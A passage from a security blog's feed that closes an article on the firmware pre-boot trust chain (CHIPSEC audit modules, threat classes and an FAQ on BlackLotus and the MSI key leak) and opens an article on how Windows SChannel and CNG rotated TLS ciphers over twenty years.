&lt;td&gt;SPI descriptor lockdown&lt;/td&gt;
&lt;td&gt;&lt;code&gt;common.spi_desc&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;SPI flash descriptor lock bit (FLOCKDN)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;BIOS write-protect&lt;/td&gt;
&lt;td&gt;&lt;code&gt;common.bios_wp&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;BIOSWE / BLE / SMM_BWP configuration&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;BIOS timestamp&lt;/td&gt;
&lt;td&gt;&lt;code&gt;common.bios_ts&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;BIOS update timestamp consistency&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;SMM lockdown&lt;/td&gt;
&lt;td&gt;&lt;code&gt;common.smm&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;System Management Mode protections including SMM_BWP&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;SPI controller lockdown&lt;/td&gt;
&lt;td&gt;&lt;code&gt;spi.spi_lock&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Per-region SPI write-protect and SPI controller lock&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;The full CHIPSEC module catalogue is in the &lt;code&gt;chipsec/modules&lt;/code&gt; directory of the project repository [@chipsec-repo] [@chipsec-page]. A typical pre-deployment audit runs &lt;code&gt;chipsec_main&lt;/code&gt; with the platform-specific module set and produces a per-module pass / fail report; any FAIL on the modules above maps directly to a known CVE class.&lt;/p&gt;

On a CHIPSEC-supported platform (Linux or Windows, with the kernel driver installed), `sudo chipsec_main` runs the full default module set against the current platform and prints a per-module PASS / FAIL summary. To restrict to the SPI / BIOS protection subset above, use `sudo chipsec_main -m common.bios_wp -m common.spi_desc -m common.spi_access -m spi.spi_lock -m common.smm -m common.bios_ts`. Read the CHIPSEC manual at [@chipsec-page] before running on production hardware; some modules touch SMI handlers and can wedge a misconfigured platform.
&lt;h3&gt;For the threat-model architect: three closed, three open&lt;/h3&gt;
&lt;p&gt;The chain closes three threat classes:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;OS-level rootkit persistence below the kernel&lt;/strong&gt; (Mebromi-class attacks against unprotected SPI).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Signed-but-revoked bootloader chain-loading&lt;/strong&gt; (BlackLotus-class attacks against bootmgfw + Secure Boot).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Remote firmware reflash without physical access&lt;/strong&gt; (driver-class attacks against poorly-locked SPI controllers).&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The chain does &lt;em&gt;not&lt;/em&gt; close three other classes:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Physical-SPI-access before the platform is fused and locked&lt;/strong&gt; (Thunderstrike-class attacks via debug headers or controller ports).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Leaked OEM key on already-shipped silicon&lt;/strong&gt; (MSI 2023-class capability transfers).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Supply-chain compromise of the silicon itself&lt;/strong&gt; (the most-cited but operationally rarest class).&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Practitioner alternative stacks&lt;/h3&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; If the OEM trust chain does not meet your threat model, the open-firmware community has an alternative for many platforms. - &lt;strong&gt;coreboot&lt;/strong&gt; [@coreboot-org] [@wiki-coreboot] (originated as LinuxBIOS at Los Alamos National Laboratory in 1999) is the most widely deployed open firmware, shipping by default on every Chromebook. - &lt;strong&gt;Heads&lt;/strong&gt; [@heads-repo] (Trammell Hudson&apos;s payload) runs on top of coreboot to provide TPM-measured boot with second-factor attestation (typically a YubiKey). It is the high-assurance Linux deployment baseline of choice for several investigative-journalism shops. - &lt;strong&gt;EDK II&lt;/strong&gt; [@edk2-repo] is the reference open-source UEFI implementation if you need UEFI semantics rather than coreboot semantics. None of these magically restore revocation at the fuse layer, but they remove the OEM signing infrastructure as a single point of failure for everything above the fuse.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;You now have the chain, the limits, and the controls. The FAQ kills the recurring misconceptions.&lt;/p&gt;
&lt;h2&gt;11. Frequently Asked Questions&lt;/h2&gt;

Secure Boot in the abstract protects against unsigned-bootloader execution; it does not by itself protect against signed-but-vulnerable bootloader execution. BlackLotus exploited CVE-2022-21894 against a Microsoft-signed boot manager [@cve-2022-21894-nvd] [@eset-blacklotus]. The vulnerable binary was still signed -- and &quot;patched&quot; is not the same as &quot;revoked.&quot; Until Microsoft adds the vulnerable binary&apos;s hash to dbx (which is what KB5025885 does, on a multi-year staged rollout to avoid bricking unpatched systems [@kb5025885]), Secure Boot will continue to load and execute the vulnerable binary.

No -- see §6 Callout. KB5025885 modifies DB (PCA2023 added) and DBX (vulnerable bootmgfw hashes added); the Platform Key is untouched [@kb5025885].

This is a threat-model question, not a factual one. The Intel ME (now CSME on Skylake and later) runs MINIX 3 [@wiki-ime] [@tanenbaum-letter] and provides a set of services that the OEM may or may not have enabled: Active Management Technology, PTT firmware TPM, and Identity Protection Technology, among others [@intel-csme-whitepaper]. Whether you call that &quot;a backdoor&quot; depends on whether you consider remote attestation, hardware-rooted identity, and out-of-band management to be services or threats. The factual content is that the CSME runs, has its own runtime, has had CVEs (INTEL-SA-00086 [@intel-sa-00086] [@ermolov-goryachy-2017]), and ships on essentially every consumer Intel platform since Skylake.

No. The name appears to be a confabulation that does not correspond to any verifiable primary research. The real SPI-write research bases for the pre-boot chain are Thunderstrike (Trammell Hudson, 31C3, December 2014 [@thunderstrike] [@ccc-31c3]), CHIPSEC (Bulygin et al., CanSecWest 2014 [@c7zero-chipsec]), and LogoFAIL post-exploitation (Binarly, December 2023 [@binarly-logofail]). If you see &quot;Hudson Hammer&quot; cited, treat it as a hallucinated reference.

No -- Thunderspy targets a separate SPI region for the Thunderbolt controller. See §8 Limit 4 for the full mechanism [@thunderspy-report].

Cortex-A5 with TrustZone is the well-attested answer for Family 15h and Family 17h (see §3 hedge for the reverse-engineering corpus). Cortex-A7 is unsupported by any vendor primary or community reverse engineering. Family 19h and later is not publicly documented.

No -- pre-Skylake ME (1 through 10) ran ThreadX on ARC; ME 11 (Skylake) introduced MINIX 3 on Intel Quark; Ice Lake and later CSME moved to Tremont-class x86 but kept MINIX 3. See the §3 generational table [@wiki-ime].

Because capability transfer is permanent regardless of when it gets operationalised. The leaked keys correspond to public-key hashes that have already been burned into the FPF on every affected chip [@binarly-msi] [@helpnet-msi-leak]. There is no fuse-layer revocation primitive [@register-msi-alt]. The chips are permanently downgraded to a model in which an attacker who has the leaked keys can sign new Boot Guard firmware that the platform will accept. The waiting time between disclosure and operationalisation is the only variable; the structural condition is not recoverable.
&lt;h3&gt;Closing thought&lt;/h3&gt;
&lt;p&gt;You came in believing Secure Boot was the trust anchor. You leave knowing it is the fifth rung. The four rungs below it -- microcode, ACM or PSP boot ROM, FPF or OEM-key fuse policy read, IBB verification -- are the ones that actually anchor the chain. The most permanent of those is the bottom rung, and the most permanent rung is also the one with no revocation surface. Read those two sentences together and you have the whole article in a paragraph. Read them with the MSI 2023 leak in mind and you have the reason this article needed to exist.&lt;/p&gt;
&lt;p&gt;&amp;lt;StudyGuide slug=&quot;below-the-os-pre-boot-trust-chain&quot; keyTerms={[
  { term: &quot;ACM&quot;, definition: &quot;Authenticated Code Module -- the Intel-signed binary that the CPU verifies against a silicon-fused public key and runs inside the CPU package as the first stage of Boot Guard.&quot; },
  { term: &quot;FPF&quot;, definition: &quot;Field Programmable Fuse -- the one-time-programmable polysilicon fuse array inside Intel&apos;s PCH or CPU package that stores the OEM Boot Guard public-key hash and profile bits.&quot; },
  { term: &quot;BPM&quot;, definition: &quot;Boot Policy Manifest -- the OEM-signed manifest that names the Initial Boot Block regions, the expected hash, and the active Boot Guard profile.&quot; },
  { term: &quot;PSP&quot;, definition: &quot;AMD Platform Security Processor -- an ARM Cortex-A5 with TrustZone, on-die coprocessor that boots before the x86 cores and runs the PSP boot ROM.&quot; },
  { term: &quot;PSB&quot;, definition: &quot;AMD Platform Secure Boot -- the AMD architectural feature in which the PSP verifies the OEM-signed BIOS image against an OEM-key fuse before releasing the x86 cores from reset.&quot; },
  { term: &quot;IBB&quot;, definition: &quot;Initial Boot Block -- the first chunk of UEFI firmware cryptographically covered by the lower-rung silicon verifier (ACM on Intel, PSP on AMD).&quot; },
  { term: &quot;CSME&quot;, definition: &quot;Converged Security and Management Engine -- Intel&apos;s on-die security processor running MINIX 3 from ME 11 / Skylake forward.&quot; },
  { term: &quot;SVN&quot;, definition: &quot;Secure Version Number -- a monotonically increasing version number used as a revocation primitive when the platform refuses to load any artifact below its stored SVN floor.&quot; },
  { term: &quot;SBAT&quot;, definition: &quot;Secure Boot Advanced Targeting -- a generation-number revocation model for shim and downstream components, replacing per-hash dbx revocation for entire vulnerability classes.&quot; },
  { term: &quot;DRTM&quot;, definition: &quot;Dynamic Root of Trust for Measurement -- a late-launch primitive (Intel TXT or AMD SKINIT) that re-anchors the trust chain after the static root has done its work.&quot; }
]} questions={[
  { q: &quot;Why is the FPF the bottom of the Intel pre-boot trust chain?&quot;, a: &quot;Because it is the only layer that cannot be rewritten without replacing the chip, so it must be the layer that anchors all other verifications.&quot; },
  { q: &quot;What is the load-bearing structural difference between the fuse layer and the SBAT layer?&quot;, a: &quot;The SBAT layer has an expressive revocation primitive (generation-number deny-list); the fuse layer has none, because the fuse stores the hash of an OEM public key and cannot be modified.&quot; },
  { q: &quot;Why is KB5025885 not a Platform Key rotation?&quot;, a: &quot;Because the mechanism is db (PCA2023 added) plus dbx (vulnerable bootmgfw hashes added) plus SVN, not Platform Key modification. The Platform Key itself is unchanged.&quot; },
  { q: &quot;What does the MSI 2023 OEM-key leak demonstrate about the chain&apos;s structural properties?&quot;, a: &quot;That a leaked OEM Boot Guard private key cannot be revoked at the fuse layer because the FPF stores the public-key hash, not a revocation list, so every chip carrying that hash is permanently downgraded.&quot; },
  { q: &quot;Does Thunderspy bypass Boot Guard?&quot;, a: &quot;No. Thunderspy targets Thunderbolt controller firmware in a separate SPI region. The main BIOS SPI region verified by Boot Guard / PSB is not affected.&quot; }
]} /&amp;gt;&lt;/p&gt;
</content:encoded><category>firmware-security</category><category>uefi</category><category>secure-boot</category><category>intel-boot-guard</category><category>amd-psp</category><category>csme</category><category>pluton</category><category>trusted-computing</category><author>noreply@paragmali.com (Parag Mali)</author></item><item><title>Rotating Every Cipher: SChannel and the Twenty-Year Algorithm-Agility Story of Windows TLS</title><link>https://paragmali.com/blog/rotating-every-cipher-schannel-and-the-twenty-year-algorithm/</link><guid isPermaLink="true">https://paragmali.com/blog/rotating-every-cipher-schannel-and-the-twenty-year-algorithm/</guid><description>How one Windows DLL rotated every TLS primitive from RC4 to ML-KEM without breaking IIS, RDP, SQL Server, or .NET SslStream -- and why Vista&apos;s 2007 CNG was the inflection point.</description><pubDate>Wed, 03 Jun 2026 00:00:00 GMT</pubDate><content:encoded>
Windows speaks TLS through **SChannel**, the SSPI provider in `schannel.dll` [@ms-learn-schannel-ssp]. Across roughly twenty years SChannel has rotated every cryptographic primitive in its default cipher list -- from RSA key transport and RC4 to ECDHE, AES-GCM, and ML-KEM -- without breaking IIS, RDP, SQL Server, LDAPS, WinHTTP, or .NET `SslStream`. That was only possible because Microsoft, in Vista&apos;s 2007 **CNG** (Cryptography API: Next Generation), made algorithm agility a first-class architectural property [@ms-learn-cng-portal]: BCrypt for primitive dispatch, NCrypt for key custodians, SymCrypt as the unified FIPS-validated backend [@symcrypt-github]. This article walks the substrate from CryptoAPI 1.0 through CNG and SymCrypt, the five cipher-suite generations the substrate carried, the 2014 MS14-066 / WinShock RCE (which was *not* Heartbleed) [@ms14-066], the certificate-validation pipeline, and the in-flight post-quantum hybrid TLS 1.3 rollout (`X25519MLKEM768`, FIPS 203) [@fips-203][@ms-learn-cng-mlkem-examples].
&lt;h2&gt;1. Two PowerShell Outputs, Twelve Years Apart&lt;/h2&gt;
&lt;p&gt;Run &lt;code&gt;Get-TlsCipherSuite&lt;/code&gt; on a freshly installed Windows Server 2025 and the output is unrecognisable to a 2012 administrator [@ms-learn-get-tlsciphersuite]. RC4 is gone. 3DES is gone. The list is led by &lt;code&gt;TLS_AES_256_GCM_SHA384&lt;/code&gt; and &lt;code&gt;TLS_AES_128_GCM_SHA256&lt;/code&gt; -- TLS 1.3 cipher suites that did not exist when &lt;code&gt;schannel.dll&lt;/code&gt; was first written. Yet IIS, SQL Server, RDP via CredSSP, LDAPS, WinHTTP, and every .NET &lt;code&gt;SslStream&lt;/code&gt; consumer on the planet still compiles against the same Win32 SSPI surface they did in 2007 [@ms-learn-schannel-ssp]. How does one DLL rotate every cryptographic primitive in its lineup without breaking the world above it?&lt;/p&gt;
&lt;p&gt;That question is this article&apos;s organising prompt. The answer, held back deliberately until Section 4, is &lt;strong&gt;algorithm agility&lt;/strong&gt; -- the architectural property Microsoft made first-class when it shipped Cryptography API: Next Generation alongside Windows Vista in early 2007 [@ms-learn-cng-portal].&lt;/p&gt;

The Win32 abstraction that lets an application acquire credentials, build a security context, and exchange authentication tokens without knowing which protocol (Kerberos, NTLM, Negotiate, or **Schannel**) is doing the work underneath. SChannel is the SSP that implements SSL, TLS, and DTLS on Windows; its module is `schannel.dll` and its public surface is `AcquireCredentialsHandle` / `InitializeSecurityContext` / `AcceptSecurityContext` [@ms-learn-schannel-ssp].
&lt;h3&gt;Which Windows endpoints SChannel actually owns&lt;/h3&gt;
&lt;p&gt;SChannel is not the only TLS stack that runs on Windows, but the Windows TLS endpoints Microsoft itself owns all run through it. SChannel is the SSP behind:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;IIS&lt;/strong&gt; TLS termination for HTTP/1.1 and HTTP/2 (HTTP/3 over QUIC terminates in &lt;code&gt;msquic.dll&lt;/code&gt;, which uses SChannel for the TLS 1.3 handshake key derivation and then performs the per-packet AEAD outside &lt;code&gt;schannel.dll&lt;/code&gt; per RFC 9001 §5 [@msquic-tls-md][@rfc-9001]).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;RDP&lt;/strong&gt; Network Level Authentication via CredSSP -- the CredSSP SSP wraps SChannel to deliver the TLS-protected credential prompt before the RDP session opens.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;LDAPS&lt;/strong&gt; for Active Directory client and server bindings.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;RPC over HTTPS&lt;/strong&gt; as used by Outlook Anywhere and historical Exchange topologies.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;SQL Server&lt;/strong&gt; TDS-over-TLS encryption on Windows.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;WinHTTP&lt;/strong&gt; and &lt;strong&gt;WinINet&lt;/strong&gt; -- the Win32 HTTP clients behind &lt;code&gt;BITS&lt;/code&gt;, &lt;code&gt;WebClient&lt;/code&gt;, and many enterprise agents.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;.NET &lt;code&gt;SslStream&lt;/code&gt;&lt;/strong&gt; when running on Windows. On Linux .NET delegates to OpenSSL; on macOS it uses Apple&apos;s Network framework.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The endpoints SChannel does &lt;em&gt;not&lt;/em&gt; own on a typical Windows box are equally important to name. &lt;strong&gt;Chromium and (via Chromium) Microsoft Edge&lt;/strong&gt; ship BoringSSL -- legacy EdgeHTML used Windows native crypto, but it has been end-of-life since Edge&apos;s January 15, 2020 Chromium-based re-launch. &lt;strong&gt;Firefox&lt;/strong&gt; ships NSS. &lt;strong&gt;Containerised .NET workloads on Linux&lt;/strong&gt; ship with OpenSSL. &lt;strong&gt;SQL Server on Linux&lt;/strong&gt; uses OpenSSL too [@boringssl-readme][@dotnet-cross-platform-crypto]. The Windows TLS story is genuinely a Windows-platform story, not a &quot;what speaks TLS on a Windows machine&quot; story.On Linux, .NET&apos;s &lt;code&gt;SslStream&lt;/code&gt; does not use SChannel at all -- it delegates to OpenSSL [@dotnet-cross-platform-crypto]. The Win32 SChannel story really is a Windows-platform story, not a story about everything TLS-shaped that happens on a Windows machine.MsQuic uses SChannel only for the TLS 1.3 handshake key derivation -- the per-packet AEAD that protects QUIC payloads runs &lt;em&gt;outside&lt;/em&gt; &lt;code&gt;schannel.dll&lt;/code&gt;, in MsQuic itself, per RFC 9001 §5 packet protection [@msquic-tls-md][@rfc-9001]. The MsQuic project documents the TLS abstraction layer (&lt;code&gt;CxPlatTlsProcessData&lt;/code&gt;) and notes explicitly that &quot;the TLS record layer is not included&quot; and that &quot;TLS exposes the encryption key material to QUIC to secure its own packets&quot; [@msquic-tls-md].&lt;/p&gt;
&lt;h3&gt;The artifact comparison&lt;/h3&gt;
&lt;p&gt;The cleanest way to see the substrate&apos;s twenty-year track record is to compare what &lt;code&gt;Get-TlsCipherSuite&lt;/code&gt; returns on two Windows generations [@ms-learn-get-tlsciphersuite][@ms-learn-cipher-suites-schannel]. The TLS 1.3 cipher suites listed on the Windows Server 2022 / 2025 page (&lt;code&gt;TLS_AES_128_GCM_SHA256&lt;/code&gt;, &lt;code&gt;TLS_AES_256_GCM_SHA384&lt;/code&gt;, &lt;code&gt;TLS_CHACHA20_POLY1305_SHA256&lt;/code&gt;) [@ms-learn-tls-cipher-suites-server-2022] simply are not on the Windows 7 / Server 2008 R2 page [@ms-learn-tls-cipher-suites-windows-7]; conversely, the Windows 7 page enumerates &lt;code&gt;TLS_RSA_WITH_RC4_128_SHA&lt;/code&gt;, &lt;code&gt;TLS_RSA_WITH_3DES_EDE_CBC_SHA&lt;/code&gt;, and &lt;code&gt;TLS_RSA_WITH_AES_128_CBC_SHA&lt;/code&gt; as enabled by default -- suites that newer Windows builds have either removed or moved off-by-default [@ms-learn-tls-registry-settings].&lt;/p&gt;
&lt;p&gt;{`
// Approximation of the SChannel cipher-suite roster on two Windows generations.
const server2012R2 = [
  &apos;TLS_RSA_WITH_RC4_128_SHA&apos;,
  &apos;TLS_RSA_WITH_3DES_EDE_CBC_SHA&apos;,
  &apos;TLS_RSA_WITH_AES_128_CBC_SHA&apos;,
  &apos;TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA&apos;,
  &apos;TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256&apos;,
];&lt;/p&gt;
&lt;p&gt;const server2025 = [
  &apos;TLS_AES_256_GCM_SHA384&apos;,
  &apos;TLS_AES_128_GCM_SHA256&apos;,
  &apos;TLS_CHACHA20_POLY1305_SHA256&apos;,
  &apos;TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384&apos;,
  &apos;TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256&apos;,
];&lt;/p&gt;
&lt;p&gt;const rotatedOut = server2012R2.filter(s =&amp;gt; !server2025.includes(s));
const rotatedIn  = server2025.filter(s =&amp;gt; !server2012R2.includes(s));&lt;/p&gt;
&lt;p&gt;console.log(&apos;Rotated out (2012R2 default -&amp;gt; 2025 absent):&apos;);
rotatedOut.forEach(s =&amp;gt; console.log(&apos;  - &apos; + s));
console.log(&apos;Rotated in (2025 default -&amp;gt; 2012R2 unavailable):&apos;);
rotatedIn.forEach(s =&amp;gt; console.log(&apos;  + &apos; + s));
`}&lt;/p&gt;
&lt;p&gt;The whole journey, on one timeline:&lt;/p&gt;

gantt
    dateFormat YYYY
    axisFormat %Y
    title SChannel substrate eras and primitive rotations
    section Substrate
    CryptoAPI 1.0 (CSPs)        :crit, capi, 1996, 2007
    CNG (BCrypt + NCrypt)       :active, cng, 2007, 2026
    SymCrypt unified engine     :sym, 2017, 2026
    section Protocol versions
    SSL 2.0 / 3.0 / TLS 1.0     :p10, 1996, 2014
    TLS 1.1 / 1.2               :p12, 2008, 2026
    TLS 1.3 default-on          :p13, 2021, 2026
    section Cipher generations
    ECDHE plus AES-GCM debut    :g1, 2009, 2026
    RC4 deprecation             :g2, 2013, 2016
    3DES retirement             :g3, 2019, 2026
    SHA-1 sunset                :g4, 2016, 2022
    TLS 1.0 / 1.1 off-default   :g5, 2020, 2025
    X25519MLKEM768 hybrid       :g6, 2025, 2026
&lt;p&gt;CNG did not exist for the first eleven years of SChannel&apos;s life. To see why CNG had to be invented, the next section walks the rigidity that almost broke the Windows TLS stack before AES could even be standardised.&lt;/p&gt;
&lt;h2&gt;2. Before CNG: PCT 1.0, SSL, and the Tyranny of &lt;code&gt;ALG_ID&lt;/code&gt;&lt;/h2&gt;
&lt;p&gt;In October 1995 a five-author byline from Microsoft Corporation -- Josh Benaloh, Butler Lampson, Daniel Simon, Terence Spies, and Bennet Yee -- posted &lt;code&gt;draft-benaloh-pct-00&lt;/code&gt; to the IETF [@draft-benaloh-pct-00]. The draft introduced &lt;strong&gt;Private Communication Technology version 1&lt;/strong&gt;, a protocol whose abstract reads: &quot;this protocol corrects or improves on several weaknesses of SSL.&quot; The byline matters. Butler Lampson had received the Turing Award in 1992. Microsoft was not toying with PCT; it intended to win the secure-transport standardisation race.Butler Lampson&apos;s appearance on the PCT 1.0 draft byline (alongside Benaloh, Simon, Spies, Yee) is not incidental. Lampson won the Turing Award in 1992. Microsoft was serious about PCT 1.0 as a protocol, not merely an implementation.&lt;/p&gt;
&lt;p&gt;PCT lost. By the time &lt;code&gt;schannel.dll&lt;/code&gt; shipped in Windows NT 4.0 (commonly placed in 1996 per contemporary release histories), the new SChannel SSP had to negotiate three incompatible handshakes on the same wire: SSL 2.0, SSL 3.0, and PCT 1.0 [@ms-learn-schannel-ssp]. By Vista, PCT was gone; SSL 2.0 was on its way to formal IETF prohibition [@rfc-6176]; SSL 3.0 had a few years left before POODLE would kill it off in 2014 [@poodle-pdf]. The protocol-level story is well-trodden. The substrate underneath -- the &lt;em&gt;engine&lt;/em&gt; SChannel called into to compute each primitive -- is what made the next decade much harder than it had to be.&lt;/p&gt;
&lt;h3&gt;CryptoAPI 1.0 and the CSP cage&lt;/h3&gt;

A loadable DLL that implements a fixed catalog of cryptographic operations under **CryptoAPI 1.0**. Each CSP advertises a *provider type* (e.g. `PROV_RSA_FULL`, `PROV_RSA_SCHANNEL`) and exposes its primitives through opaque `ALG_ID` constants such as `CALG_RC4`, `CALG_3DES`, and `CALG_SHA1`. Adding a new primitive meant shipping a new CSP DLL, registering it under `HKLM\Software\Microsoft\Cryptography\Defaults\Provider`, and threading a fresh BLOB type through every consumer that called `CryptAcquireContext`.
&lt;p&gt;The CryptoAPI 1.0 model had a single fatal property: the primitive &lt;em&gt;was&lt;/em&gt; the API. To compute SHA-256, code had to ask CAPI for an &lt;code&gt;ALG_ID&lt;/code&gt; whose numeric value was &lt;code&gt;CALG_SHA_256&lt;/code&gt; -- and that constant only existed once Microsoft shipped a CSP that defined it, in the same OS release that introduced the algorithm [@ms-learn-alg-id]. Elliptic-curve cryptography never arrived in CAPI in any usable form; the &lt;code&gt;ALG_ID + key BLOB&lt;/code&gt; shape simply could not express the named curves, parameter sets, point-compression flags, or per-curve coordinate sizes that ECC required.&lt;/p&gt;
&lt;p&gt;So in the early 2000s SChannel&apos;s cipher-suite list was less a menu of cryptography and more a snapshot of what CSPs had shipped. FIPS 197 (the AES standard) was published in November 2001. Windows XP shipped without AES in its default SChannel cipher list and only got it broadly via Service Pack 3 and Server 2003. &lt;strong&gt;The four-year AES gap was not Microsoft dragging its feet -- it was the thickness of a CSP-rev cycle.&lt;/strong&gt; RC4 dominance, 3DES persistence, 1024-bit RSA inertia, no ECC: these were the substrate&apos;s fingerprints, not the vendor&apos;s preferences.&lt;/p&gt;

flowchart LR
    A[Application -- IIS / IE / RPC] --&amp;gt; B[SChannel SSP]
    B --&amp;gt; C[CryptoAPI 1.0 / CryptAcquireContext]
    C --&amp;gt; D[&quot;RSA SChannel CSP -- ALG_ID lookup&quot;]
    C --&amp;gt; E[&quot;Base / Enhanced CSP -- ALG_ID lookup&quot;]
    C --&amp;gt; F[Smart Card CSP]
    D -. &quot;Adding ECC requires a new CSP, new ALG_ID, new BLOB type, new IANA codepoint&quot; .-&amp;gt; G((Friction))
    E -. &quot;Adding SHA-256 requires CSP rev + OS release&quot; .-&amp;gt; G
&lt;h3&gt;The PCT failure as a &lt;em&gt;positive&lt;/em&gt; lesson&lt;/h3&gt;
&lt;p&gt;PCT&apos;s loss is, in retrospect, the strongest early case for algorithm agility. SChannel had shipped PCT-the-protocol in 1996; by 2007 PCT was a footnote and SChannel was speaking TLS 1.0, TLS 1.1, SSL 3.0, and (with the right service pack) early TLS 1.2 drafts. The application surface above SChannel did not flinch. Microsoft had bet on PCT, lost, rotated to TLS, and shipped the rotation through the &lt;em&gt;protocol&lt;/em&gt; abstraction that the SSP boundary provided.&lt;/p&gt;
&lt;p&gt;What the SSP boundary did &lt;em&gt;not&lt;/em&gt; shield was the primitive layer. Algorithm rotation had to happen one CSP rev at a time. By the mid-2000s Microsoft&apos;s engineering leadership had a clear diagnosis: the protocol abstraction worked; the primitive abstraction did not. The next CSP rev would not save them, because there were not enough CSP revs in the future to keep up with what cryptography was about to do -- ECC was already standardised, AEAD constructions were being designed, and the post-quantum research had been live for a decade.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; The early-2000s lag in AES adoption, the persistence of RC4 and 3DES, and the absence of ECC in Windows were not vendor laziness. CryptoAPI 1.0&apos;s &lt;code&gt;ALG_ID&lt;/code&gt; + provider-type model was &lt;em&gt;structurally incapable&lt;/em&gt; of representing ECC&apos;s named curves and parameter sets. The right question was never &quot;why is Microsoft slow?&quot; -- it was &quot;what would a Windows cryptographic substrate that was &lt;em&gt;not&lt;/em&gt; slow look like?&quot; The Vista CNG redesign is what that question&apos;s answer looks like.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;RC4 dominance, 3DES persistence, 1024-bit RSA inertia, no ECC -- these were not laziness, they were the substrate. A fix to TLS 1.0 was easy; a fix to &lt;em&gt;the way Windows let an application reach a primitive&lt;/em&gt; was a rewrite.&lt;/p&gt;
&lt;h2&gt;3. Configuration Agility Without Substrate Agility: XP and Server 2003&lt;/h2&gt;
&lt;p&gt;Consider a single registry path: &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\TLS 1.0\Client\DisabledByDefault&lt;/code&gt;. That value was introduced for SChannel&apos;s TLS 1.0 support in the XP / Server 2003 era. It is &lt;em&gt;exactly&lt;/em&gt; the same registry sub-tree path an operator uses in 2026 to disable TLS 1.0 itself [@ms-learn-tls-registry-settings]. The configuration surface from 1999 has outlasted three generations of TLS.&lt;/p&gt;
&lt;p&gt;This is not an accident. By the time TLS 1.0 landed in Windows (RFC 2246, Tim Dierks and Christopher Allen at Certicom, January 1999 [@rfc-2246]) and TLS 1.1 followed (RFC 4346, Dierks and Eric Rescorla, April 2006 [@rfc-4346]), SChannel had developed an emerging design pattern: every protocol version became a sub-key, every cipher suite became a registry-driven enable/disable, and the &lt;code&gt;SSL Cipher Suite Order&lt;/code&gt; Group Policy gave administrators a single rope to pull when an algorithm fell from grace.&lt;/p&gt;
&lt;p&gt;That model has aged well. Microsoft&apos;s current &lt;code&gt;tls-registry-settings&lt;/code&gt; page is essentially the same structural document it would have been twenty years ago, with new sub-keys for each new protocol version (SSL 2.0, SSL 3.0, TLS 1.0, TLS 1.1, TLS 1.2, TLS 1.3, DTLS 1.0, DTLS 1.2) and new values for the policy levers Microsoft has added along the way [@ms-learn-tls-registry-settings].The same &lt;code&gt;SCHANNEL\Protocols\&amp;lt;ver&amp;gt;\&amp;lt;role&amp;gt;\Enabled&lt;/code&gt; pattern handles SSL 2, SSL 3, TLS 1.0, TLS 1.1, TLS 1.2, TLS 1.3, DTLS 1.0, and DTLS 1.2. A single sub-key per protocol; new versions slot in without reorganising the hive.&lt;/p&gt;
&lt;h3&gt;The four sub-keys an XP / Server 2003 box exposed&lt;/h3&gt;
&lt;p&gt;The shape of the &lt;code&gt;SCHANNEL\&lt;/code&gt; hive on a representative Server 2003 R2 box, reconstructed from Microsoft Knowledge Base article KB245030 (&quot;How to restrict the use of certain cryptographic algorithms and protocols in Schannel.dll&quot;) and the modern Microsoft Learn &lt;code&gt;tls-registry-settings&lt;/code&gt; page that preserves the same structural document [@ms-learn-tls-registry-settings], is shown below.Microsoft Knowledge Base article KB245030 (&quot;How to restrict the use of certain cryptographic algorithms and protocols in Schannel.dll&quot;) is the *origin document* for the four-sub-key SCHANNEL\ registry pattern this section dumps. The original &lt;code&gt;support.microsoft.com&lt;/code&gt; URL now returns HTTP 404; the same content lives at Microsoft Learn&apos;s &lt;code&gt;tls-registry-settings&lt;/code&gt; page [@ms-learn-tls-registry-settings]. The four sub-keys (&lt;code&gt;Protocols&lt;/code&gt;, &lt;code&gt;Ciphers&lt;/code&gt;, &lt;code&gt;Hashes&lt;/code&gt;, &lt;code&gt;KeyExchangeAlgorithms&lt;/code&gt;) have been stable since Windows 2000. The DWORD convention is itself the agility affordance: &lt;code&gt;0xffffffff&lt;/code&gt; means &quot;enabled,&quot; &lt;code&gt;0&lt;/code&gt; means &quot;disabled,&quot; and the &lt;code&gt;Server&lt;/code&gt; versus &lt;code&gt;Client&lt;/code&gt; role split lets an admin disable SSL 2.0 &lt;em&gt;server&lt;/em&gt;-side without breaking outbound HTTPS &lt;em&gt;client&lt;/em&gt;-side during the transition.&lt;/p&gt;
